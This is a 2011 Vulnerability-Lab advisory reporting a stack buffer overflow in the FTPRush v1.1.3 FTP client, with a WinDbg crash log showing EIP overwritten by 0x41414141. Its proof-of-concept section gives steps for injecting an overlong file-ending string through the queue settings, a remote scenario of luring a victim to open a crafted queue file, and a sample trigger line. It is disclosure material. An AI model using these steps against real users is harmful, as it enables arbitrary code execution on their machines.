FTPRush v1.1.3 - Stack Buffer Overflow Vulnerability

2011-06-16T00:00:00
ID VULNERLAB:54
Type vulnerlab
Reporter Vulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve)
Modified 2011-06-16T00:00:00

Description

                                        
                                            Document Title:
===============
FTPRush v1.1.3 - Stack Buffer Overflow Vulnerability


References (Source):
====================
http://www.youtube.com/watch?v=Fxr35RAcaUA


Release Date:
=============
2011-06-16


Vulnerability Laboratory ID (VL-ID):
====================================
54


Product & Service Introduction:
===============================
As the most up-to-date solution in FTP transfer, FTPRush is not just a fast, reliable, powerful and easy-to-use FTP program for 
Microsoft Windows, It is a full-featured FXP client with secure SSL/TLS encryption too. It allows you to transfer files from local 
to server, server to local or server to server. It allows you to fully customize the user interface on-the-fly. It allows you to 
create your own FTP scripts to do automatic jobs.

 Operating Systems: WindowsÆ 98/Me/NT4.0/2000/XP/2003/VISTA
 Tabbed Interface for smooth control over multiple active connections
 GUI Runtime Customization and Integrated Docking; spice up the look of it all with your own style or favorites such as MS OfficeÆ 2000/XP/2003
 Drag-And-Drop files via Explorer-like interface
 Easiest way to FXP files from one server to another
 Lightning speed than other FTP clients to download or upload files
 Built-in Task Manager for you to easily schedule all kinds of jobs.
 Allows to setting listing/downloading/uploading FTP account individually into One site and switch them automatically
 On-The-Fly Compression saves your bandwidth
 Offers FTP MLSD to gives more accurate directory listing and synchronize folders
 UPnP Port-Mapping enabled FTP client to accepts incoming connections from server
 Multi-Language support makes the FTP Client easily translatable to your native language if its not already done
 HTTP Proxy, FTP Proxy, Socks 4 & 5 support; create different proxies and switch between them with a simple mouse click 

The RushFTP software is one of the most used in the flasher, downloader +fxp scenes & has won several adwards on different famous vendor websites.


(Copy of the Vendor Homepage: http://www.ftprush.com/product-ftprush.html)


Abstract Advisory Information:
==============================
Vulnerability-Lab team discovered a Stack Buffer Overflow Vulnerability on FTPRush, a famous FTP Client/Server Software.
A remote attacker is able to overwrite the ECX & EIP. No validation checks are performed on the length of the file endings on transfer. 
By passing in a long file ending string, it is possible to trigger a stack-based buffer overflow, resulting in the execution of arbitrary code.


Vulnerability Disclosure Timeline:
==================================
2010-08-03:	Vendor Notification
2010-12-01:	Vendor Response/Feedback
2011-06-03:	Public or Non-Public Disclosure


Discovery Status:
=================
Published


Affected Product(s):
====================

Exploitation Technique:
=======================
Remote


Severity Level:
===============
Critical


Technical Details & Description:
================================
A stack based Buffer Overflow Vulnerability is detected on FTPRush Software. By passing in a long file ending string, it is possible 
to trigger a stack-based buffer overflow, resulting in the execution of arbitrary code.

--- Debug Logs ---

...   ...
ModLoad: 73a30000 73a46000   C:/Windows/SysWOW64/davclnt.dll
ModLoad: 73a20000 73a28000   C:/Windows/SysWOW64/DAVHLPR.dll
ModLoad: 74d30000 74d3f000   C:/Windows/SysWOW64/wkscli.dll
ModLoad: 74d60000 74d69000   C:/Windows/SysWOW64/netutils.dll
(10e8.1504): Unknown exception - code 000006ba (first chance)
ModLoad: 68e50000 68e9e000   C:/Windows/SysWOW64/actxprxy.dll
ModLoad: 6e750000 6e988000   WPDSHEXT.dll
ModLoad: 6e750000 6e988000   C:/Windows/SysWOW64/wpdshext.dll
ModLoad: 68d90000 68e19000   C:/Windows/SysWOW64/PortableDeviceApi.dll
ModLoad: 75980000 759ad000   C:/Windows/syswow64/WINTRUST.dll
ModLoad: 74360000 7439f000   SHMEDIA.dll
ModLoad: 74360000 7439f000   C:/Windows/SysWOW64/audiodev.dll
ModLoad: 6dee0000 6e147000   C:/Windows/SysWOW64/WMVCore.DLL
ModLoad: 70d00000 70d3d000   C:/Windows/SysWOW64/WMASF.DLL
ModLoad: 72cf0000 72d21000   EhStorAPI.DLL
ModLoad: 72cf0000 72d21000   C:/Windows/SysWOW64/EhStorShell.dll
ModLoad: 66420000 66442000   C:/Windows/SysWOW64/EhStorAPI.dll
(10e8.17c4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0018e700 ebx=00066d50 ecx=00019539 edx=0018e794 esi=7ee81884 edi=00190000
eip=0040f6e9 esp=0018e758 ebp=0018e994 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210202
*** ERROR: Module load completed but symbols could not be loaded for image00400000
image00400000+0xf6e9:
0040f6e9 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
0:000> gn
(10e8.17c4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=77c187cd esi=00000000 edi=00000000
eip=41414141 esp=0018e338 ebp=0018e358 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210246

... ...

FAULTING_IP: 
+487
41414141 ??              ???

EXCEPTION_RECORD:  41414141 -- (.exr 0x41414141)
Cannot read Exception record @ 41414141

FAULTING_THREAD:  000017c4

PROCESS_NAME:  image00400000

FAULTING_MODULE: 76670000 kernel32

DEBUG_FLR_IMAGE_TIMESTAMP:  4b6bdefa

MODULE_NAME: image00400000

ERROR_CODE: (NTSTATUS) 0xc0000005 - Die Anweisung in 0x%08lx verweist auf Speicher 0x%08lx. Der Vorgang %s konnte nicht im Speicher durchgef hrt werden.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - Die Anweisung in 0x%08lx verweist auf Speicher 0x%08lx. Der Vorgang %s konnte nicht im Speicher durchgef hrt werden.

EXCEPTION_PARAMETER1:  00000008

EXCEPTION_PARAMETER2:  41414141

WRITE_ADDRESS:  41414141 

FOLLOWUP_IP: 
+487
41414141 ??              ???

FAILED_INSTRUCTION_ADDRESS: 
+487
41414141 ??              ???

IP_ON_HEAP:  41414141
The fault address in not in any loaded module, please check your builds rebase
log at <releasedir>/bin/build_logs/timebuild/ntrebase.log for module which may
contain the address if it were loaded.

IP_IN_FREE_BLOCK: 41414141

CONTEXT:  41414141 -- (.cxr 0x41414141)
Unable to read context, Win32 error 0n30

ADDITIONAL_DEBUG_TEXT:  
Use !findthebuild command to search for the target build information.
If the build information is available, run !findthebuild -s ; .reload to set symbol path and load symbols. ; 
Followup set based on attribute [Is_ChosenCrashFollowupThread] from Frame:[0] on thread:[ffffffff]

LAST_CONTROL_TRANSFER:  from 77c187b9 to 41414141

BUGCHECK_STR:  APPLICATION_FAULT_SOFTWARE_NX_FAULT_WRONG_SYMBOLS_FILL_PATTERN_41414141_STACKIMMUNE

PRIMARY_PROBLEM_CLASS:  SOFTWARE_NX_FAULT_FILL_PATTERN_41414141_STACKIMMUNE

DEFAULT_BUCKET_ID:  SOFTWARE_NX_FAULT_FILL_PATTERN_41414141_STACKIMMUNE

STACK_TEXT:  
00000000 image00400000+0x0


STACK_COMMAND:  .cxr 41414141 ; kb ; ** Pseudo Context ** ; kb

SYMBOL_NAME:  image00400000

FOLLOWUP_NAME:  MachineOwner

IMAGE_NAME:  C:/Program Files (x86)/FTPRush/ftprush.exe

FAILURE_BUCKET_ID:  SOFTWARE_NX_FAULT_FILL_PATTERN_41414141_STACKIMMUNE_c0000005_C:_Program_Files_(x86)_FTPRush_ftprush.exe!Unknown

BUCKET_ID:  APPLICATION_FAULT_SOFTWARE_NX_FAULT_WRONG_SYMBOLS_FILL_PATTERN_41414141_STACKIMMUNE_BAD_IP_image00400000

WATSON_STAGEONE_URL:  http://watson.microsoft.com/StageOne/image00400000/1_1_3_0/4b6bdefa/unknown/0_0_0_0/bbbbbbb4/c0000005/41414141.htm?Retriage=1

Followup: MachineOwner

...    ...


0018e34c: ntdll!LdrRemoveLoadAsDataTable+49b (77c187cd)
0018e778: image00400000+23d7ea (0063d7ea)
0018e99c: 41414141
Invalid exception stack at 41414141


Debug Logs(ALL):
			../Debug/logs.txt 

Pictures:
			../overflow1.png
			../overflow2.png
			../overflow3.png



Proof of Concept (PoC):
=======================
This vulnerabilities can be exploited by local & remote by attackers ...

Local Attack Way ...

1. Verbinden mit einem beliebigen Server
2. Erweitertes übertragen > Queue als
3. Queue Information > Anpassen
4. Dann über anpassen im Feld der Endungen den String einspeisen
5. EIP & ECX got overwritten by the Attacker


Remote Attack Way ...

1. Install & start a FTP Server
2. Let a person with FTPRush connect to the ftp
3. Let him open through queue the PoC transfer-file with the right code segments.
4. PWN THE BOX! 62DF7CEEE7FC46CFA2B1BDB08FF770FD/ 



Test Queue: 20LokalC:\Users\Rem0ve\Desktop\update-feeds.txt62DF7CEEE7FC46CFA2B1BDB08FF770FD/AAAAAAAAAAAAAAA+
Test Queue: [Platte][Path][File][Settings]+[String].rfq


References: Transfer-Queue

				../PoC/RushCfg.xml
				../PoC/1_1015289700.rfq


Solution - Fix & Patch:
=======================
N/A


Security Risk:
==============
A remote attacker is able to overwrite the ECX & EIP. No validation checks are performed on the length of the file endings on transfer. 
By passing in a long file ending string, it is possible to trigger a stack-based buffer overflow, resulting in the execution of arbitrary code.
The security risk of the vulnerability is estimated as critical because of the local/remote execution of arbitrary code.


Credits & Authors:
==================
Vulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.vulnerability-lab.com/register
Contact:    admin@vulnerability-lab.com 	- support@vulnerability-lab.com 	       - research@vulnerability-lab.com
Section:    video.vulnerability-lab.com 	- forum.vulnerability-lab.com 		       - news.vulnerability-lab.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.

    				   	Copyright © 2012 | Vulnerability Laboratory